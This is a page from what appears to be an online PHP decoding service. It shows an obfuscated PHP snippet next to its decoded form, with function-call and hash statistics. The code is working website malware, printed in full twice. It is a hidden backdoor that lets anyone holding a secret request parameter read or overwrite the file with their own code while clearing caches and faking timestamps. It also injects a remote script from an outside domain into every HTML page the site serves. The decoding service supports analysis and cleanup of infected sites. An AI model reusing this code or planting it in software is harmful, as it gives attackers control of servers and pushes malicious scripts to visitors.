Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){ if(empty($_REQU..

Decoded Output download

<?  if(isset($_REQUEST["s0788y7iy0q2ok8b"])){ 
    if(empty($_REQUEST["s0788y7iy0q2ok8b"])){ 
        echo bin2hex(gzdeflate(file_get_contents(__FILE__))); 
    } else { 
        header("X-LiteSpeed-Purge: *"); 
        if(function_exists("opcache_reset")){ 
            @opcache_reset(); 
        } 
         
        if(function_exists("apc_clear_cache")){ 
            @apc_clear_cache(); 
        } 
         
        $joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__); 
        echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["s0788y7iy0q2ok8b"])))); 
        @touch(__FILE__,$joc6p8+1,$o22r67+1); 
    } 
    die; 
} 
 
if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){ 
    function tw2g6a($joc6p8){ 
        return str_replace("</head>","<script type='text/javascript' async src='https://rkrnp5ib.cloudfire.quest/challenge.js'></script></head>",$joc6p8); 
    } 
    ob_start("tw2g6a"); 
} ?>

Did this file decode correctly?

Original Code

if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){
    if(empty($_REQUEST["\1630\x37\x38\x38\1717i\x790\x71\x32o\x6b\x38\x62"])){
        echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
    } else {
        header("X\x2d\114iteS\160\145\145d\x2dP\x75\x72\x67e\72\40\52");
        if(function_exists("\x6fpc\141\x63h\145_\162\145se\x74")){
            @opcache_reset();
        }
        
        if(function_exists("\141\x70c\137\143\x6c\x65\x61\x72\x5f\143\x61\x63he")){
            @apc_clear_cache();
        }
        
        $joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__);
        echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["\x73\60\67\x38\x38\x79\x37i\171\x30\x71\62\x6fk\x38\142"]))));
        @touch(__FILE__,$joc6p8+1,$o22r67+1);
    }
    die;
}

if(isset($_SERVER["\x48T\x54\x50\x5f\101CC\x45\120\x54"])&&(strpos($_SERVER["\x48T\124P_A\103\x43E\x50\x54"],"\164\x65\170\x74\57\x68\x74m\154")!==false||$_SERVER["\110\124\124P\x5f\101CCE\x50\124"]==="*\x2f\x2a")){
    function tw2g6a($joc6p8){
        return str_replace("\74\x2fh\x65\141\x64\76","<s\143\162\151p\x74 \x74\171\x70\x65='\x74\145\170\x74\57j\x61\166\141\x73cri\160t' \141s\x79n\143\40\163\162c=\47\150t\164\160\x73\x3a/\57\x72\153\x72\156\x70\x35\151\142.cl\x6f\165d\146\151\x72\x65\56qu\x65\163\x74\x2f\143\x68\141\154\x6c\x65n\x67e\x2e\x6as\x27\x3e\74\57s\143\x72i\x70\164\x3e<\57\150\145\141\x64\76",$joc6p8);
    }
    ob_start("t\x77\62\x676\x61");
}

Function Calls

strpos 1

Variables

None

Stats

MD5 7d698419dfee871c29924a8564911c07
Eval Count 0
Decode Time 98 ms